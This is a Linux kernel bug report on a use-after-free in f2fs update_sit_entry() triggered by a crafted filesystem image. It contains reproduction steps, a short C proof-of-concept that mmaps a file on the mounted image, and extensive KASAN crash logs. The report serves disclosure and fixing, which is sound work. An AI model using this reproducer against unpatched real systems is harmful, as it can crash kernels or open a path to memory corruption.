Bug 200179

Summary:	use-after-free in update_sit_entry() when operating on a corrupted f2fs image
Product:	File System	Reporter:	Wen Xu (wen.xu)
Component:	f2fs	Assignee:	F2FS development list (linux-f2fs-devel)
Status:	RESOLVED CODE_FIX
Severity:	normal	CC:	chao, wen.xu
Priority:	P1
Hardware:	All
OS:	Linux
Kernel Version:	4.18	Subsystem:
Regression:	No	Bisected commit-id:
Attachments:	The (compressed) crafted image which causes crash

Description Wen Xu 2018-06-22 14:00:15 UTC

Created attachment 276739 [details]
The (compressed) crafted image which causes crash

- Overview
use-after-free in update_sit_entry() when operating on a corrupted f2fs image

- Reproduce (4.18 upstream kernel)
# mkdir mnt
# mount -t f2fs final.img
# gcc -o poc poc.c
# ./poc ./mnt

- POC (poc.c)
#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <linux/falloc.h>
#include <linux/loop.h>

static void activity(char *mpoint) {

  char *foo_bar_baz;
  int err;

  err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint);

  int fd = open(foo_bar_baz, O_RDONLY, 0);
  if (fd >= 0) {
    void *mem = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE | MAP_POPULATE, fd, 0);

    if (mem != MAP_FAILED)
      munmap(mem, 4096);

    close(fd);
  }
}

int main(int argc, char *argv[]) {
  activity(argv[1]);
  return 0;
}


- Kernel message
[  565.037249] F2FS-fs (loop0): Mounted with checkpoint version = 3
[  572.892317] ==================================================================
[  572.893980] BUG: KASAN: use-after-free in update_sit_entry+0x84/0x7d0
[  572.895296] Read of size 4 at addr ffff8801e1d49a40 by task a.out/1309

[  572.896974] CPU: 0 PID: 1309 Comm: a.out Not tainted 4.18.0-rc1+ #4
[  572.896977] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  572.896983] Call Trace:
[  572.897016]  dump_stack+0x7b/0xb5
[  572.897046]  print_address_description+0x70/0x290
[  572.897052]  kasan_report+0x291/0x390
[  572.897056]  ? update_sit_entry+0x84/0x7d0
[  572.897069]  __asan_load4+0x78/0x80
[  572.897074]  update_sit_entry+0x84/0x7d0
[  572.897084]  f2fs_allocate_data_block+0x69e/0xbc0
[  572.897091]  ? __radix_tree_lookup+0xb2/0x160
[  572.897097]  do_write_page+0xcd/0x140
[  572.897102]  f2fs_outplace_write_data+0x129/0x240
[  572.897106]  ? f2fs_do_write_node_page+0x180/0x180
[  572.897116]  ? inc_zone_page_state+0x58/0x100
[  572.897130]  ? unlock_page_memcg+0x2b/0x80
[  572.897150]  ? __test_set_page_writeback+0x333/0x5e0
[  572.897156]  f2fs_convert_inline_page+0x388/0x640
[  572.897161]  ? f2fs_read_inline_data+0x300/0x300
[  572.897167]  ? __get_node_page+0x331/0x5b0
[  572.897172]  f2fs_convert_inline_inode+0x36e/0x470
[  572.897176]  ? f2fs_convert_inline_page+0x640/0x640
[  572.897180]  ? kasan_kmalloc+0xad/0xe0
[  572.897191]  f2fs_file_mmap+0x7e/0xc0
[  572.897201]  mmap_region+0x5dc/0x8d0
[  572.897207]  do_mmap+0x543/0x790
[  572.897216]  vm_mmap_pgoff+0x182/0x1f0
[  572.897222]  ? vma_is_stack_for_current+0x60/0x60
[  572.897232]  ? putname+0x80/0x90
[  572.897246]  ? __fget+0xbe/0x110
[  572.897251]  ksys_mmap_pgoff+0x2a9/0x3a0
[  572.897264]  ? find_mergeable_anon_vma+0x60/0x60
[  572.897275]  ? filp_open+0x60/0x60
[  572.897279]  ? vm_brk+0x20/0x20
[  572.897303]  __x64_sys_mmap+0x94/0xb0
[  572.897318]  do_syscall_64+0x78/0x170
[  572.897333]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  572.897349] RIP: 0033:0x7fb2878e56ba
[  572.897351] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  572.897406] RSP: 002b:00007ffc524b5f78 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  572.897418] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb2878e56ba
[  572.897420] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  572.897423] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  572.897425] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  572.897427] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000

[  572.897774] Allocated by task 1144:
[  572.898511]  save_stack+0x46/0xd0
[  572.898514]  kasan_kmalloc+0xad/0xe0
[  572.898519]  __kmalloc+0x11f/0x240
[  572.898538]  sk_prot_alloc+0xa5/0x180
[  572.898549]  sk_alloc+0x31/0x350
[  572.898561]  __netlink_create+0x53/0x120
[  572.898565]  netlink_create+0x18b/0x350
[  572.898569]  __sock_create+0x13a/0x280
[  572.898573]  __sys_socket+0xc5/0x170
[  572.898577]  __x64_sys_socket+0x43/0x50
[  572.898581]  do_syscall_64+0x78/0x170
[  572.898585]  entry_SYSCALL_64_after_hwframe+0x44/0xa9

[  572.898914] Freed by task 0:
[  572.899522]  save_stack+0x46/0xd0
[  572.899525]  __kasan_slab_free+0x13c/0x1a0
[  572.899529]  kasan_slab_free+0xe/0x10
[  572.899533]  kfree+0x8c/0x1c0
[  572.899536]  __sk_destruct+0x27e/0x280
[  572.899539]  sk_destruct+0x2d/0x40
[  572.899542]  __sk_free+0x53/0x120
[  572.899545]  sk_free+0x1e/0x20
[  572.899548]  deferred_put_nlk_sk+0x105/0x110
[  572.899568]  rcu_process_callbacks+0x2cb/0x850
[  572.899578]  __do_softirq+0x11d/0x341

[  572.899920] The buggy address belongs to the object at ffff8801e1d49980
                which belongs to the cache kmalloc-2048 of size 2048
[  572.902435] The buggy address is located 192 bytes inside of
                2048-byte region [ffff8801e1d49980, ffff8801e1d4a180)
[  572.904806] The buggy address belongs to the page:
[  572.905789] page:ffffea0007875200 count:1 mapcount:0 mapping:ffff8801f6802a80 index:0x0 compound_mapcount: 0
[  572.907784] flags: 0x2ffff0000008100(slab|head)
[  572.908716] raw: 02ffff0000008100 0000000000000000 0000000100000001 ffff8801f6802a80
[  572.910272] raw: 0000000000000000 00000000000f000f 00000001ffffffff 0000000000000000
[  572.911839] page dumped because: kasan: bad access detected

[  572.913299] Memory state around the buggy address:
[  572.914272]  ffff8801e1d49900: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[  572.915730]  ffff8801e1d49980: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  572.917180] >ffff8801e1d49a00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  572.918630]                                            ^
[  572.919721]  ffff8801e1d49a80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  572.921176]  ffff8801e1d49b00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  572.922627] ==================================================================
[  572.924096] Disabling lock debugging due to kernel taint
[  572.924315] WARNING: CPU: 0 PID: 1309 at fs/f2fs/segment.c:1822 update_sit_entry+0x70b/0x7d0
[  572.924321] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  572.924814] CPU: 0 PID: 1309 Comm: a.out Tainted: G    B             4.18.0-rc1+ #4
[  572.924817] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  572.924823] RIP: 0010:update_sit_entry+0x70b/0x7d0
[  572.924824] Code: e9 5e fc ff ff 49 8d 7c 24 10 e8 c0 c6 ad ff 49 8b 5c 24 10 be 04 00 00 00 48 8d 7b 48 e8 8d ca ad ff 8b 5b 48 e9 60 fd ff ff <0f> 0b f0 41 80 4c 24 48 04 e9 d7 f9 ff ff 49 8d 7c 24 10 e8 8d c6
[  572.924878] RSP: 0018:ffff8801ed107778 EFLAGS: 00010286
[  572.924881] RAX: 0000000000000200 RBX: ffff8801e1d49a40 RCX: 0000000000000000
[  572.924884] RDX: ffffffffffffffff RSI: ffffffffffffffff RDI: ffff8801de23f29c
[  572.924887] RBP: ffff8801ed1077d0 R08: ffffed003edc3ebb R09: ffffed003edc3ebb
[  572.924890] R10: 0000000000000001 R11: ffffed003edc3eba R12: ffff8801de23ee80
[  572.924892] R13: 0000000000000200 R14: 00000000ffffffff R15: ffff8801de23eee0
[  572.924896] FS:  00007fb287dc9700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  572.924899] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  572.924901] CR2: 00007fb2878db030 CR3: 00000001e4b08000 CR4: 00000000000006f0
[  572.924912] Call Trace:
[  572.924920]  f2fs_allocate_data_block+0x69e/0xbc0
[  572.924926]  ? __radix_tree_lookup+0xb2/0x160
[  572.924931]  do_write_page+0xcd/0x140
[  572.924936]  f2fs_outplace_write_data+0x129/0x240
[  572.924940]  ? f2fs_do_write_node_page+0x180/0x180
[  572.924945]  ? inc_zone_page_state+0x58/0x100
[  572.924949]  ? unlock_page_memcg+0x2b/0x80
[  572.924954]  ? __test_set_page_writeback+0x333/0x5e0
[  572.924959]  f2fs_convert_inline_page+0x388/0x640
[  572.924963]  ? f2fs_read_inline_data+0x300/0x300
[  572.924969]  ? __get_node_page+0x331/0x5b0
[  572.924974]  f2fs_convert_inline_inode+0x36e/0x470
[  572.924978]  ? f2fs_convert_inline_page+0x640/0x640
[  572.924982]  ? kasan_kmalloc+0xad/0xe0
[  572.924987]  f2fs_file_mmap+0x7e/0xc0
[  572.924991]  mmap_region+0x5dc/0x8d0
[  572.924996]  do_mmap+0x543/0x790
[  572.925002]  vm_mmap_pgoff+0x182/0x1f0
[  572.925008]  ? vma_is_stack_for_current+0x60/0x60
[  572.925012]  ? putname+0x80/0x90
[  572.925016]  ? __fget+0xbe/0x110
[  572.925021]  ksys_mmap_pgoff+0x2a9/0x3a0
[  572.925026]  ? find_mergeable_anon_vma+0x60/0x60
[  572.925030]  ? filp_open+0x60/0x60
[  572.925034]  ? vm_brk+0x20/0x20
[  572.925039]  __x64_sys_mmap+0x94/0xb0
[  572.925044]  do_syscall_64+0x78/0x170
[  572.925049]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  572.925052] RIP: 0033:0x7fb2878e56ba
[  572.925053] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  572.925157] RSP: 002b:00007ffc524b5f78 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  572.925176] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb2878e56ba
[  572.925178] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  572.925188] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  572.925197] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  572.925213] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[  572.925226] ---[ end trace 4ce02f25ff7d3df5 ]---
[  572.925249] F2FS-fs (loop0): Bitmap was wrongly cleared, blk:196608
[  572.926570] WARNING: CPU: 0 PID: 1309 at fs/f2fs/segment.c:1874 update_sit_entry+0x7a7/0x7d0
[  572.926571] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  572.926633] CPU: 0 PID: 1309 Comm: a.out Tainted: G    B   W         4.18.0-rc1+ #4
[  572.926636] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  572.926642] RIP: 0010:update_sit_entry+0x7a7/0x7d0
[  572.926643] Code: 00 00 00 e9 53 fa ff ff 4c 89 e7 e8 23 c6 ad ff 8b 4d c8 49 8b 3c 24 48 c7 c2 40 f3 9b b9 48 c7 c6 00 f3 9b b9 e8 f9 de fc ff <0f> 0b f0 41 80 4c 24 48 04 48 89 df 45 31 f6 e8 f5 c4 ad ff 66 83
[  572.926696] RSP: 0018:ffff8801ed107778 EFLAGS: 00010286
[  572.926700] RAX: 0000000000000000 RBX: ffff8801e1d49a40 RCX: 0000000000000000
[  572.926703] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003da20ec5
[  572.926705] RBP: ffff8801ed1077d0 R08: ffffed003edc3ebb R09: ffffed003edc3ebb
[  572.926708] R10: 0000000000000001 R11: ffffed003edc3eba R12: ffff8801de23ee80
[  572.926710] R13: 0000000000000000 R14: 00000000ffffffff R15: ffff8801de23eee0
[  572.926714] FS:  00007fb287dc9700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  572.926716] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  572.926719] CR2: 00007fb2878db030 CR3: 00000001e4b08000 CR4: 00000000000006f0
[  572.926723] Call Trace:
[  572.926730]  f2fs_allocate_data_block+0x69e/0xbc0
[  572.926735]  ? __radix_tree_lookup+0xb2/0x160
[  572.926741]  do_write_page+0xcd/0x140
[  572.926746]  f2fs_outplace_write_data+0x129/0x240
[  572.926750]  ? f2fs_do_write_node_page+0x180/0x180
[  572.926755]  ? inc_zone_page_state+0x58/0x100
[  572.926759]  ? unlock_page_memcg+0x2b/0x80
[  572.926764]  ? __test_set_page_writeback+0x333/0x5e0
[  572.926769]  f2fs_convert_inline_page+0x388/0x640
[  572.926773]  ? f2fs_read_inline_data+0x300/0x300
[  572.926779]  ? __get_node_page+0x331/0x5b0
[  572.926784]  f2fs_convert_inline_inode+0x36e/0x470
[  572.926788]  ? f2fs_convert_inline_page+0x640/0x640
[  572.926792]  ? kasan_kmalloc+0xad/0xe0
[  572.926797]  f2fs_file_mmap+0x7e/0xc0
[  572.926801]  mmap_region+0x5dc/0x8d0
[  572.926806]  do_mmap+0x543/0x790
[  572.926812]  vm_mmap_pgoff+0x182/0x1f0
[  572.926818]  ? vma_is_stack_for_current+0x60/0x60
[  572.926822]  ? putname+0x80/0x90
[  572.926826]  ? __fget+0xbe/0x110
[  572.926831]  ksys_mmap_pgoff+0x2a9/0x3a0
[  572.926836]  ? find_mergeable_anon_vma+0x60/0x60
[  572.926840]  ? filp_open+0x60/0x60
[  572.926844]  ? vm_brk+0x20/0x20
[  572.926849]  __x64_sys_mmap+0x94/0xb0
[  572.926854]  do_syscall_64+0x78/0x170
[  572.926859]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  572.926862] RIP: 0033:0x7fb2878e56ba
[  572.926863] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  572.926916] RSP: 002b:00007ffc524b5f78 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  572.926921] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb2878e56ba
[  572.926923] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  572.926925] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  572.926927] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  572.926929] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[  572.926933] ---[ end trace 4ce02f25ff7d3df6 ]---
[  572.926987] BUG: unable to handle kernel NULL pointer dereference at 0000000000000000
[  572.928598] PGD 80000001e0ac9067 P4D 80000001e0ac9067 PUD 1e17c9067 PMD 0
[  572.929980] Oops: 0000 [#1] SMP KASAN PTI
[  572.930796] CPU: 0 PID: 1309 Comm: a.out Tainted: G    B   W         4.18.0-rc1+ #4
[  572.932439] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[  572.934980] RIP: 0010:update_sit_entry+0x61a/0x7d0
[  572.936345] Code: 00 f6 c4 08 74 51 48 8d 7b 18 e8 b1 c7 ad ff 4c 89 e9 48 03 4b 18 48 89 cf 48 89 4d c8 e8 fe c4 ad ff 48 8b 4d c8 0f b6 45 ab <0f> be 11 21 d0 88 01 8b 45 d0 85 d0 74 75 49 8d bc 24 54 04 00 00
[  572.940671] RSP: 0018:ffff8801ed107778 EFLAGS: 00010282
[  572.941747] RAX: 000000000000007f RBX: ffff8801e1d49a40 RCX: 0000000000000000
[  572.943185] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
[  572.944678] RBP: ffff8801ed1077d0 R08: ffffed003edc3ebb R09: ffffed003edc3ebb
[  572.946129] R10: 0000000000000001 R11: ffffed003edc3eba R12: ffff8801de23ee80
[  572.947541] R13: 0000000000000000 R14: 0000000000000000 R15: ffff8801de23eee0
[  572.948973] FS:  00007fb287dc9700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  572.950574] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  572.951729] CR2: 0000000000000000 CR3: 00000001e4b08000 CR4: 00000000000006f0
[  572.953145] Call Trace:
[  572.953657]  f2fs_allocate_data_block+0x69e/0xbc0
[  572.954609]  ? __radix_tree_lookup+0xb2/0x160
[  572.955492]  do_write_page+0xcd/0x140
[  572.956253]  f2fs_outplace_write_data+0x129/0x240
[  572.957208]  ? f2fs_do_write_node_page+0x180/0x180
[  572.958176]  ? inc_zone_page_state+0x58/0x100
[  572.959059]  ? unlock_page_memcg+0x2b/0x80
[  572.959908]  ? __test_set_page_writeback+0x333/0x5e0
[  572.960916]  f2fs_convert_inline_page+0x388/0x640
[  572.961876]  ? f2fs_read_inline_data+0x300/0x300
[  572.962817]  ? __get_node_page+0x331/0x5b0
[  572.978799]  f2fs_convert_inline_inode+0x36e/0x470
[  572.979797]  ? f2fs_convert_inline_page+0x640/0x640
[  572.980788]  ? kasan_kmalloc+0xad/0xe0
[  572.981552]  f2fs_file_mmap+0x7e/0xc0
[  572.982301]  mmap_region+0x5dc/0x8d0
[  572.983031]  do_mmap+0x543/0x790
[  572.983710]  vm_mmap_pgoff+0x182/0x1f0
[  572.984480]  ? vma_is_stack_for_current+0x60/0x60
[  572.985434]  ? putname+0x80/0x90
[  572.986102]  ? __fget+0xbe/0x110
[  572.986763]  ksys_mmap_pgoff+0x2a9/0x3a0
[  572.987566]  ? find_mergeable_anon_vma+0x60/0x60
[  572.988509]  ? filp_open+0x60/0x60
[  572.989205]  ? vm_brk+0x20/0x20
[  572.989851]  __x64_sys_mmap+0x94/0xb0
[  572.990601]  do_syscall_64+0x78/0x170
[  572.991349]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[  572.992375] RIP: 0033:0x7fb2878e56ba
[  572.993096] Code: 89 f5 41 54 49 89 fc 55 53 74 35 49 63 e8 48 63 da 4d 89 f9 49 89 e8 4d 63 d6 48 89 da 4c 89 ee 4c 89 e7 b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 56 5b 5d 41 5c 41 5d 41 5e 41 5f c3 0f 1f 00
[  572.996863] RSP: 002b:00007ffc524b5f78 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[  572.998369] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007fb2878e56ba
[  572.999799] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[  573.001211] RBP: 0000000000000003 R08: 0000000000000003 R09: 0000000000000000
[  573.002626] R10: 0000000000008002 R11: 0000000000000246 R12: 0000000000000000
[  573.004050] R13: 0000000000001000 R14: 0000000000008002 R15: 0000000000000000
[  573.005471] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd mac_hid i2c_piix4 soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx raid1 raid0 multipath linear 8139too crct10dif_pclmul crc32_pclmul qxl drm_kms_helper syscopyarea aesni_intel sysfillrect sysimgblt fb_sys_fops ttm drm aes_x86_64 crypto_simd cryptd 8139cp glue_helper mii pata_acpi floppy
[  573.014836] CR2: 0000000000000000
[  573.015637] ---[ end trace 4ce02f25ff7d3df7 ]---
[  573.016629] RIP: 0010:update_sit_entry+0x61a/0x7d0
[  573.017610] Code: 00 f6 c4 08 74 51 48 8d 7b 18 e8 b1 c7 ad ff 4c 89 e9 48 03 4b 18 48 89 cf 48 89 4d c8 e8 fe c4 ad ff 48 8b 4d c8 0f b6 45 ab <0f> be 11 21 d0 88 01 8b 45 d0 85 d0 74 75 49 8d bc 24 54 04 00 00
[  573.021441] RSP: 0018:ffff8801ed107778 EFLAGS: 00010282
[  573.022492] RAX: 000000000000007f RBX: ffff8801e1d49a40 RCX: 0000000000000000
[  573.023950] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
[  573.025397] RBP: ffff8801ed1077d0 R08: ffffed003edc3ebb R09: ffffed003edc3ebb
[  573.026817] R10: 0000000000000001 R11: ffffed003edc3eba R12: ffff8801de23ee80
[  573.028310] R13: 0000000000000000 R14: 0000000000000000 R15: ffff8801de23eee0
[  573.029747] FS:  00007fb287dc9700(0000) GS:ffff8801f6e00000(0000) knlGS:0000000000000000
[  573.031356] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  573.032555] CR2: 0000000000000000 CR3: 00000001e4b08000 CR4: 00000000000006f0

- Location
https://elixir.bootlin.com/linux/latest/source/fs/f2fs/segment.c#L1828
	se = get_seg_entry(sbi, segno);
se is used after free based on KASAN report.

Reported by Wen Xu (wen.xu@gatech.edu) from SSLab at Gatech.

Comment 1 Wen Xu 2018-06-29 15:46:02 UTC

For f2fs-dev,

# mkdir mnt
# mount -t f2fs final.img
# gcc -o poc poc.c
# ./poc ./mnt

Kernel still gives the following panic information:

[ 1424.571209] F2FS-fs (loop0): Mounted with checkpoint version = 3
[ 1428.840765] F2FS-fs (loop0): access invalid blkaddr:196608
[ 1428.840833] WARNING: CPU: 0 PID: 2741 at fs/f2fs/checkpoint.c:151 f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.840835] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
[ 1428.840935] CPU: 0 PID: 2741 Comm: a.out Not tainted 4.17.0+ #1
[ 1428.840939] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014
[ 1428.840945] RIP: 0010:f2fs_is_valid_blkaddr+0x179/0x320
[ 1428.840946] Code: 85 e5 fe ff ff 48 89 df 88 44 24 07 e8 20 4b da ff 48 8b 3b 44 89 e1 48 c7 c2 00 f9 57 a5 48 c7 c6 a0 f7 57 a5 e8 47 44 ff ff <0f> 0b 0f b6 44 24 07 e9 b4 fe ff ff 48 8d 7f 60 e8 f2 4a da ff 48 
[ 1428.841006] RSP: 0018:ffff8801ea2d78f0 EFLAGS: 00010286
[ 1428.841011] RAX: 0000000000000000 RBX: ffff8801939e5d80 RCX: 0000000000000000
[ 1428.841014] RDX: 0000000000000000 RSI: 0000000000000008 RDI: ffffed003d45aef4
[ 1428.841018] RBP: 0000000000000005 R08: ffffed003e744f21 R09: ffffed003e744f21
[ 1428.841021] R10: 0000000000000001 R11: ffffed003e744f20 R12: 0000000000030000
[ 1428.841024] R13: ffff8801ee1be600 R14: 0000000000004000 R15: 0000000000003e00
[ 1428.841029] FS:  00007fb14355c700(0000) GS:ffff8801f3a00000(0000) knlGS:0000000000000000
[ 1428.841033] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 1428.841036] CR2: 00007fb14306c030 CR3: 00000001ec9d4000 CR4: 00000000000006f0
[ 1428.841044] Call Trace:
[ 1428.841055]  f2fs_iget+0xcd8/0x1a80
[ 1428.841064]  ? f2fs_lookup+0x2e7/0x580
[ 1428.841068]  f2fs_lookup+0x2e7/0x580
[ 1428.841074]  ? __recover_dot_dentries+0x400/0x400
[ 1428.841080]  ? __recover_dot_dentries+0x400/0x400
[ 1428.841089]  path_openat+0x1b15/0x1fa0
[ 1428.841097]  ? vfs_unlink+0x250/0x250
[ 1428.841105]  ? save_stack+0x94/0xb0
[ 1428.841111]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.841119]  ? kmem_cache_alloc+0xc8/0x1e0
[ 1428.841124]  ? getname_flags+0x73/0x2b0
[ 1428.841132]  ? do_sys_open+0x144/0x2a0
[ 1428.841141]  ? do_syscall_64+0x73/0x160
[ 1428.841152]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.841165]  ? __alloc_pages_slowpath+0x1260/0x1260
[ 1428.841171]  ? policy_nodemask+0x1a/0x90
[ 1428.841175]  ? policy_node+0x56/0x70
[ 1428.841184]  ? __mod_node_page_state+0x22/0xa0
[ 1428.841195]  ? __handle_mm_fault+0x119a/0x1920
[ 1428.841201]  do_filp_open+0x12b/0x1d0
[ 1428.841206]  ? may_open_dev+0x50/0x50
[ 1428.841212]  ? getname_flags+0x73/0x2b0
[ 1428.841217]  ? kasan_unpoison_shadow+0x31/0x40
[ 1428.841222]  ? kasan_kmalloc+0xa6/0xd0
[ 1428.841232]  ? __alloc_fd+0x1b0/0x250
[ 1428.841238]  ? do_sys_open+0x175/0x2a0
[ 1428.841243]  do_sys_open+0x175/0x2a0
[ 1428.841249]  ? filp_open+0x50/0x50
[ 1428.841256]  do_syscall_64+0x73/0x160
[ 1428.841263]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1428.841268] RIP: 0033:0x7fb14306c040
[ 1428.841269] Code: 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 83 3d 09 27 2d 00 00 75 10 b8 02 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 31 c3 48 83 ec 08 e8 7e e0 01 00 48 89 04 24 
[ 1428.841329] RSP: 002b:00007ffc651d93b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000002
[ 1428.841334] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007fb14306c040
[ 1428.841337] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000002229080
[ 1428.841340] RBP: 00007ffc651d93f0 R08: 0000000002229010 R09: 0000000000000000
[ 1428.841343] R10: 000000000000069d R11: 0000000000000246 R12: 00000000004005c0
[ 1428.841347] R13: 00007ffc651d94f0 R14: 0000000000000000 R15: 0000000000000000
[ 1428.841351] ---[ end trace b1cfe6aeee92e9a4 ]---
[ 1428.841357] F2FS-fs (loop0): invalid blkaddr: 196608, type: 5, run fsck to fix.
[ 1428.841621] WARNING: CPU: 0 PID: 2741 at fs/f2fs/f2fs.h:2685 f2fs_iget+0x1875/0x1a80
[ 1428.841623] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_timer snd soundcore mac_hid i2c_piix4 ib_iser rdma_cm iw_cm ib_cm ib_core configfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear 8139too qxl ttm crct10dif_pclmul drm_kms_helper crc32_pclmul ghash_clmulni_intel pcbc aesni_intel aes_x86_64 crypto_simd cryptd glue_helper syscopyarea sysfillrect sysimgblt fb_sys_fops drm 8139cp mii floppy pata_acpi
